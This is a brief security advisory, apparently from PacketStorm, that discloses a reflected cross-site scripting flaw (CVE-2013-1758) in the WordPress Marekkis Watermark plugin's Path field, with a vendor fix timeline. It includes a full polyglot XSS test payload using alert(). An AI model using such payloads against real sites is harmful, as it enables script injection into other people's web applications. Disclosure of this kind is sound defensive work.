    WordPress Marekkis Watermark plugin suffers from a cross site scripting vulnerability. ############################# Exploit Title : Reflective XSS in Marekkis Watermark-Plugin Cross-Site Scripting Vulnerability Author: Aditya Balapure home: http://adityabalapure.blogspot.in/ Date: 18/02/13 software link: http://wordpress.org/extend/plugins/marekkis-watermark/ CVE Assigned - CVE-2013-1758 ############################# Marekkis Watermark-Plugin description Marekkis Watermark-Plugin for WordPress can watermark your pictures an two different ways: Insert your watermark while the picture is being uploaded. After the activation every picture that you will upload with wordpress build-in media-uploader will be watermarked. In the configuration-screen you can set up the position and the type of your watermark. It can be your logo (.png-file) with transparent background or a free text with color, font, size, shadow and transparency-level of your choice. See screenshots. Insert your watermark on all chosen pictures from a directory on your web-server. Marekkis Watermark makes possible to create a watermark on mediafiles that are already uploaded on your server. So you can mark all your old pictures with the new watermark. ########################## XSS location The Marekkis Watermark-Plugin in Wordpress http://wordpress.org/extend/plugins/marekkis-watermark/ has a Reflected XSS Vulnerability in the Path input box. Script Used- ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ########################## Vendor Notification 05/02/2013 to: - Vendor notified awaiting action 17/02/2013 - Fixed and closed Source: PacketStorm
×
×
  • Create New...